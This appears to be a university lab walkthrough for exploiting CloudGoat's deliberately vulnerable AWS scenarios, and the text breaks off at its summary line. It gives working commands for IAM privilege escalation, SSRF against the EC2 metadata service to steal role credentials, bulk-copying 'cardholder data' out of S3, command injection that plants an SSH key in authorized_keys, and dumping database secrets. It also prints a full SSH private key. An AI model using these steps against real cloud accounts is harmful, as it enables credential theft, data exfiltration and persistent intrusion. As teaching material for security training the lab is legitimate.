The complexity of cloud-based applications can lead to a vast number of security issues. To show how these issues can occur, Rhino Security Labs' CloudGoat implements an intentionally vulnerable set of cloud deployments on AWS that users can exploit to gain unauthorized access.
In this codelab, we will walk through how to exploit each deployment.
Note that if you are using Cloud9 for this exercise, you must turn off AWS managed temporary credentials. The vulnerable application credentials are located here. To add these credentials as a profile within the AWS CLI, run the following command and copy/paste the credentials into the profile. For the region name, specify us-east-1 (where the resources for CloudGoat have been deployed). Leave the output format set to the default.
aws configure --profile raynor
Starting with Raynor's limited credentials, you will use them to view prior versions of the security policy associated with Raynor.
While the permissions you currently have would allow you to revert to a prior version of the policy and restore a full set of admin rights, you will simply find the policy version that corresponds to a full set of rights.
Fill in the raynor username in the command below and run it.
aws iam list-attached-user-policies --profile raynor --user-name <raynor_username>
List the versions of the policy that is associated with raynor.
aws iam list-policy-versions --profile raynor --policy-arn <PolicyARN>
Step through each version of the policy using the command below.
aws iam get-policy-version --profile raynor --policy-arn <PolicyARN> --version-id <versionID>
One can set the policy version to the version that allows full privileges, and thereby gain access to all of the AWS project's resources, via the set-default-policy-version command. However, as this is a shared instance of CloudGoat, leave the policy version alone for others.
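For reference only, the escalation would be a single command (do not run it against the shared instance):
aws iam set-default-policy-version --profile raynor --policy-arn <PolicyARN> --version-id <versionID>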
Misconfigured proxies can allow an external attacker to proxy requests to sensitive internal servers that are not directly reachable otherwise. An example of this is internal Metadata servers that keep sensitive authorization information for the account running the infrastructure. This is exactly what happened in the Capital One breach which this scenario is derived from.
The vulnerable proxy location is given here.
We start with the proxy and initiate a server-side request forgery that allows us to use the proxy to pivot over to the Metadata service for the EC2 instance. Given the credentials we find on the Metadata service, we then assume the role associated with the EC2 instance hosting the proxy.
From this role, we can see that it has access to a multitude of S3 buckets that would not otherwise be accessible to us. Using the AWS CLI, we can then use the role obtained to exfiltrate sensitive data.
Start by visiting the site from linux.cs.pdx.edu using curl to hit the web server. (Access to the site is restricted to PSU machines.)
curl http://<ec2_instance_IP>
For the purpose of this exercise, the server has been set up to proxy requests, but restricts itself only to requests to the Metadata service that houses the instance's AWS credentials. In the HTTP request headers, we can inject a "Host:" header to specify that we're interested in requesting the Metadata service. Repeat the curl command and specify the well-known IP address of the Metadata service.
curl http://<ec2_instance_IP> -H 'Host: 169.254.169.254'
We can navigate the Metadata service using the URL being proxied. In the previous output, a directory called latest is shown.
curl http://<ec2_instance_IP>/latest -H 'Host: 169.254.169.254'
By navigating the Metadata service, one can access the roles associated with the EC2 instance running the proxy server.
curl http://<ec2_instance_IP>/latest/meta-data/iam/security-credentials/ -H 'Host: 169.254.169.254'
curl http://<ec2_instance_IP>/latest/meta-data/iam/security-credentials/<name_of_role> -H 'Host: 169.254.169.254'
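The response should resemble the standard IMDSv1 credential document, something like the following (values elided):
{
  "Code" : "Success",
  "LastUpdated" : "...",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA...",
  "SecretAccessKey" : "PkvP...",
  "Token" : "IQoJ...",
  "Expiration" : "..."
}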
Note that the AccessKeyId, the SecretAccessKey, and a session Token are all available for you to now take on the roles associated with the EC2 instance. A session token is an ephemeral credential that can be used to authenticate access to resources.
Configure a profile called erratic from the AWS CLI containing the AWS access key ID and secret access key information as before. Note the origin of the profile name by reading this article on the Capital One breach in 2019.
aws configure --profile erratic
While the aws configure command allows us to create a profile with a particular AccessKeyId and SecretAccessKey, it does not allow us to specify the Token. There are two ways to add the token. One is to include it in another aws configure command as shown below:
aws configure set aws_session_token <BankRoleToken> --profile erratic
Another way is to edit ~/.aws/credentials. The file contains the profile information from previous aws configure commands. Adding the session token as part of the profile achieves the same result.
[erratic]
aws_access_key_id = ASIA...Z4N
aws_secret_access_key = PkvP...PM9
aws_session_token = IQoJ...w==
The token itself is ephemeral and will only be valid for several minutes. If you get an InvalidToken error on any of the subsequent commands, you will need to go back to Step 3 and obtain a fresh one.
Use the credentials to list all of the buckets in S3 for this project.
aws s3 ls --profile erratic
Identify the bucket that might contain "cardholder data" as was done by erratic in the Capital One breach.
Copy over all of the files found in the open bucket. Note that one can use either a recursive copy:
aws s3 cp --recursive s3://<bucket-name> ./cardholder-data --profile erratic
Or a sync command, which copies only the files that are new or have changed:
aws s3 sync s3://<bucket-name> ./cardholder-data --profile erratic
head -2 cardholder-data/*.csv
The vulnerable application credentials are located here. To add these credentials as a profile within the AWS CLI, run the following command and copy/paste the credentials into the profile. For the region name, specify us-east-1 (where the resources for CloudGoat have been deployed).
aws configure --profile solus
Starting with Solus's limited credentials, you will use them to discover another access key.
The keys allow you to discover a running EC2 instance that contains an SSRF vulnerability. Using this vulnerability, you will access the Metadata service.
The Metadata service exposes the EC2 instance's keys which you can then use to obtain access to a storage bucket that contains IAM keys for an administrator. Using these credentials, you will invoke a restricted Lambda function.
Use the solus profile to list the Lambda functions that are accessible.
aws lambda list-functions --profile solus
Find the Lambda function associated with the CloudGoat level (cg-lambda-...) and try invoking it as solus.
aws lambda invoke ./out.txt --profile solus --function-name cg-lambda-<cloudgoat_id>
While the profile is able to list the Lambdas, it does not have the ability to execute them. However, listing the functions also lists the environment variables that the Lambda has been given. Unfortunately, it is often the case that AWS credentials are passed via environment variables, since it is best practice not to include them within source code. From the listing, identify an AWS access key that the Lambda function uses to authenticate itself to project resources. Add a profile called wrex that contains these credentials, specifying us-east-1 for the region.
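If the full listing is hard to scan, you can optionally re-run it with the CLI's built-in --query option (a JMESPath filter) to show only each function's environment variables:
aws lambda list-functions --profile solus --query 'Functions[*].Environment.Variables'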
aws configure --profile wrex
Use the Lambda's credentials to list all of the running EC2 instances it has access to.
aws ec2 describe-instances --filters Name=instance-state-name,Values=running --profile wrex
Within the instances is a server associated with ec2_ssrf that is running a web site. Get its IP address, then log in to a PSU machine and use curl to access the page. (The level has restricted access to PSU IP addresses only for security purposes.)
# On linux.cs.pdx.edu or linuxlab.cs.pdx.edu
curl http://<IP_address_of_server>
The site is expecting a URL to be given and throws an error when it is not. Access it again, but with a 'url' parameter. Note that we use double-quotes around the URL so the shell does not interpret the ? or = characters in the URL.
# On linux.cs.pdx.edu or linuxlab.cs.pdx.edu
curl "http://<IP_address_of_server>/?url=http://<FMI>"
The proxy implemented may be vulnerable to an SSRF attack. The Metadata service is a common target for such attacks. Send in the EC2 Metadata service URL as the url parameter in order to obtain the credentials the EC2 instance uses to access resources in the project.
http://169.254.169.254/latest/meta-data/iam/security-credentials/
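Combined with the curl request from the previous step, the full command looks like:
curl "http://<IP_address_of_server>/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"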
The proxy fetches the URL and returns a directory that identifies the role associated with the EC2 instance. Access the proxy again.
http://169.254.169.254/latest/meta-data/iam/security-credentials/cg-ec2-role-<cloudgoat_id>
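Again, through the proxy:
curl "http://<IP_address_of_server>/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/cg-ec2-role-<cloudgoat_id>"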
The access reveals the keys associated with the role that the EC2 instance has been given. It also contains a session token.
Configure a profile called ec2role from the AWS CLI containing the AWS access key ID and secret access key information. Specify the region as us-east-1.
aws configure --profile ec2role
Then, to specify the full credentials for the role including its session token, edit ~/.aws/credentials. Within this file, find the ec2role profile and add the session token information.
[ec2role]
aws_access_key_id = ASIA...Z4N
aws_secret_access_key = PkvP...PM9
aws_session_token = IQoJ...w==
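Alternatively, as in the previous scenario, the token can be set from the command line:
aws configure set aws_session_token <Token> --profile ec2role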
Use the ec2role profile to list the buckets it has access to.
aws s3 ls --profile ec2role
Within the bucket listings is a 'secret' bucket containing the name of the role discovered via the prior SSRF. Use the ec2role profile to list its contents.
aws s3 ls --profile ec2role s3://cg-secret-s3-bucket-<cloudgoat_id>
Retrieve the text file that resides in the bucket and view its contents.
aws s3 cp --profile ec2role s3://cg-secret-s3-bucket-<cloudgoat_id>/<textfile> .
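Then print the file you just copied down:
cat <textfile>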
The file stores credentials. As bad as it is to have credentials exposed in environment variables and SSRF accesses, it's just as bad to have credentials in storage buckets or source code. Use the credentials in this file to configure another profile called shepherd, specifying us-east-1 for the region.
aws configure --profile shepherd
Go back and attempt to invoke the initial Lambda function that was tried in the first step as solus, but use the shepherd profile.
aws lambda invoke ./out.txt --region us-east-1 --profile shepherd --function-name cg-lambda-<cloudgoat_id>
Then view the Lambda's output.
cat ./out.txt
The vulnerable application credentials are located here.
There are two ways to solve this level. We will use the one that leverages Lara's credentials. Add these credentials as a profile within the AWS CLI. For the region name, specify us-east-1 (where the resources for CloudGoat have been deployed).
aws configure --profile Lara
Starting with Lara's limited credentials, you will list the S3 buckets they can access and find that one of them holds log files from an Elastic Load Balancer instance the account is running.
The log files reveal a secret admin URL that is part of the web service being hosted. Unfortunately, there is a remote-code execution vulnerability within it. Exploit it to gain command access on an EC2 instance.
From here, we'll take a peek at the EC2 Metadata service to reveal all of the information the EC2 instance needs to access the backend database for the service. One could use this information to access the database and finish the level, but we'll solve it in a more convoluted way for fun! Returning to the instance, we will leverage the shell to list the S3 buckets the instance has access to and find the file in the bucket that contains the same backend database credentials found in the Metadata. We will use the AWS CLI to list the RDS instances available to discover the location of the backend database.
We will then use the database credentials and the location of the RDS backend to access the database and reveal the secret text.
Starting with Lara's limited credentials, list all of the S3 buckets you can find and see which ones you can list the contents for.
aws s3 ls --profile Lara
aws s3 ls --profile Lara s3://cg-XXX-s3-bucket-cgid...
aws s3 ls --profile Lara s3://cg-YYY-s3-bucket-cgid...
aws s3 ls --profile Lara s3://cg-ZZZ-s3-bucket-cgid...
For the bucket that this set of credentials can access, recursively list all of its contents.
aws s3 ls --recursive --profile Lara s3://<cg-bucket>
The bucket has log files from an Elastic Load Balancer instance the account is running. Sync the bucket contents to a local directory, then examine a log file from a prior running version of a service from 06/19/2019. Find a secret route to an HTML file that the service supported.
aws s3 sync --profile Lara s3://<cg-logs-bucket> .
less <path_to_log_file>/<logfile>
grep html <path_to_log_file>/<logfile>
Find the location of the load balancer for the currently deployed version of the service.
aws elbv2 describe-load-balancers --profile Lara
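If you prefer, the --query option can pull the DNS name of the load balancer directly:
aws elbv2 describe-load-balancers --profile Lara --query 'LoadBalancers[*].DNSName'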
Visit the URL in a web browser and verify that the service responds.
Append the secret route to the HTML file found in the previous step to reveal the hidden web interface, still supported by the service, for running commands on the web site directly.
Visit https://ifconfig.me to see the function it provides. Then within the "Run Signup Command" UI, execute the following to obtain the IP address of the instance running the web site.
curl https://ifconfig.me
The UI allows us to run any command. One command that we can run is to add an ssh key that we control to the authorized_keys of the machine running the UI. First, run the command below via the "Run Signup Command" UI to dump out the contents of the file:
cat /home/ubuntu/.ssh/authorized_keys
We wish to create an ssh key and add it to the authorized_keys file of the web site so that we can subsequently log into it. One note about the level is that it has been configured to only allow ssh from PSU machines.
So, to begin with, log into a linuxlab machine and run the following ssh-keygen command to generate a public/private ssh keypair (foo.pub, foo).
ssh-keygen -t ed25519 -f foo
Then dump out the public key (foo.pub).
cat foo.pub
If the public key has "=" anywhere within it, repeat the ssh-keygen command until you generate a public key without the character in it. This is necessary since the command injection on the application is done in a way that evaluates the "=" character.
Alternatively, if you wish to skip this step, you may instead use the keypair provided below for the exercise. Copy the contents below into their respective files foo.pub and foo.
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKdwX5jjY0TugPOVGBbU+I8JoY4Ycj7p/szytyHaBlXy wuchang@mashimaro
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCncF+Y42NE7oDzlRgW1PiPCaGOGHI+6f7M8rch2gZV8gAAAJihKTfIoSk3
yAAAAAtzc2gtZWQyNTUxOQAAACCncF+Y42NE7oDzlRgW1PiPCaGOGHI+6f7M8rch2gZV8g
AAAEAAyLF7YDOLMAj3Cby4Yb/QXbWI6Q2HinQXK5NmlX6aWKdwX5jjY0TugPOVGBbU+I8J
oY4Ycj7p/szytyHaBlXyAAAAEXd1Y2hhbmdAbWFzaGltYXJvAQIDBA==
-----END OPENSSH PRIVATE KEY-----
We now have an ssh keypair on a PSU Linux machine. To utilize the private key, we'll first need to change its permissions to allow read-only access to the user.
chmod 400 foo
We will now add the public key (foo.pub) to the web site's authorized_keys. Go back to the "Run Signup Command" UI and run an echo command that contains the contents of foo.pub, appending the output to the site's authorized_keys file.
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKdwX5jjY0TugPOVGBbU+I8JoY4Ycj7p/szytyHaBlXy wuchang@mashimaro" >> /home/ubuntu/.ssh/authorized_keys
Ensure the output shows no errors. Then, re-run Step 5 to see the key has been added properly.
Use the private ssh key to now log into the web site via its IP address (from Step 4).
ssh -i foo ubuntu@<IP_address_of_web_site>
You should now be logged into the instance running the web site.
When an EC2 instance is started, one can specify a script to execute in 'user-data' that installs software and sets up the VM. The Metadata service holds this script. Since we now have a foothold on a victim's instance, we can query the Metadata service for the script.
curl http://169.254.169.254/latest/user-data
We could use these directly; however, we'll be taking an alternate path.
See if the AWS CLI has been installed on the machine.
which aws
If not, then you are the first visitor to this level. Go ahead and install the AWS CLI:
sudo apt install awscli
Then use the AWS CLI to list the S3 buckets from Step 1.
aws s3 ls
aws s3 ls s3://cg-XXX-s3-bucket-cgid...
aws s3 ls s3://cg-YYY-s3-bucket-cgid...
aws s3 ls s3://cg-ZZZ-s3-bucket-cgid...
One bucket you can access is a 'secret-s3-bucket' that contains a file called db.txt. View the credentials that are contained in it.
aws s3 cp s3://<cg-secret-s3-bucket>/db.txt -
Use the AWS CLI on the instance to find all of the AWS RDS instances the web frontend has access to.
aws rds describe-db-instances --region us-east-1
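As before, a --query filter can extract just the database endpoint address:
aws rds describe-db-instances --region us-east-1 --query 'DBInstances[*].Endpoint.Address'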
Run the PostgreSQL client to connect to the RDS instance using the credentials found in db.txt.
psql postgresql://<db_user>:<db_password>@<rds-instance-address>:5432/<db_name>
Within the PostgreSQL client, list the tables and then dump the contents of the table holding the secret.
\dt
SELECT * from <table-name>;
You've completed the AWS CloudGoat lab.
The exercises have shown you cloud-based examples of: